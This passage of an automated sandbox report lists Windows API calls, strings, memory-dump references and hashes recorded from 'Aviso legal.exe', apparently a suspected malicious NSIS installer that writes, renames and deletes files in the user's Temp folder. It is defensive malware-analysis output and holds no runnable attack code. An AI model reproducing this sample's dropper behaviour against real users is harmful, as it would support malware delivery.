                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                • DeleteObject.GDI32(?), ref: 00401165
                                • EndPaint.USER32(?,?), ref: 0040116E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F
                                • API String ID: 941294808-1304234792
                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                • wsprintfA.USER32 ref: 00406202
                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %ls=%ls$[Rename]
                                • API String ID: 2171350718-461813615
                                • Opcode ID: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                • Opcode Fuzzy Hash: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                APIs
                                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                • GetSysColor.USER32(00000000), ref: 0040455B
                                • SetTextColor.GDI32(?,00000000), ref: 00404567
                                • SetBkMode.GDI32(?,?), ref: 00404573
                                • GetSysColor.USER32(?), ref: 00404586
                                • SetBkColor.GDI32(?,?), ref: 00404596
                                • DeleteObject.GDI32(?), ref: 004045B0
                                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                APIs
                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75E03420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                • CharNextW.USER32(?,00000000,75E03420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                • CharPrevW.USER32(?,?,75E03420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 589700163-2977677972
                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                • GetMessagePos.USER32 ref: 00404E77
                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                • MulDiv.KERNEL32(000CC1EB,00000064,000CD618), ref: 00402FDC
                                • wsprintfW.USER32 ref: 00402FEC
                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                Strings
                                • verifying installer: %d%%, xrefs: 00402FE6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                APIs
                                  • Part of subcall function 705B12BB: GlobalAlloc.KERNEL32(00000040,?,705B12DB,?,705B137F,00000019,705B11CA,-000000A0), ref: 705B12C5
                                • GlobalFree.KERNEL32(?), ref: 705B2743
                                • GlobalFree.KERNEL32(00000000), ref: 705B2778
                                Memory Dump Source
                                • Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true
                                • Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: 2fc03345d81cbf0d7047feaa9a738e2f258c7af56257cb391505e604b71dedca
                                • Instruction ID: f297e9d1c26f6dcc88a5e9757394cf590103faa47dd86fbf476c66e65de0207b
                                • Opcode Fuzzy Hash: 2fc03345d81cbf0d7047feaa9a738e2f258c7af56257cb391505e604b71dedca
                                • Instruction Fuzzy Hash: 4531B032104189DFC726AF55CD88E2E7FBAEB963003244A2DF20187220DB7878059B75
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID:
                                • API String ID: 2667972263-0
                                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                APIs
                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstAE84.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                • String ID: 4u$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nstAE84.tmp
                                • API String ID: 3248276644-2582466233
                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                APIs
                                • GlobalFree.KERNEL32(00000000), ref: 705B25C2
                                  • Part of subcall function 705B12CC: lstrcpynW.KERNEL32(00000000,?,705B137F,00000019,705B11CA,-000000A0), ref: 705B12DC
                                • GlobalAlloc.KERNEL32(00000040), ref: 705B2548
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 705B2563
                                Memory Dump Source
                                • Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true
                                • Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd
                                Similarity
                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 4216380887-0
                                • Opcode ID: fbd8c19563181c242351beaa6177d2a0352f3b5b16ca2eb571d7afb054e6f10b
                                • Instruction ID: 8d5f82dfeacebbc087ad68daaa28a8d1cf76e963b1fda7e86be7d7d274546781
                                • Opcode Fuzzy Hash: fbd8c19563181c242351beaa6177d2a0352f3b5b16ca2eb571d7afb054e6f10b
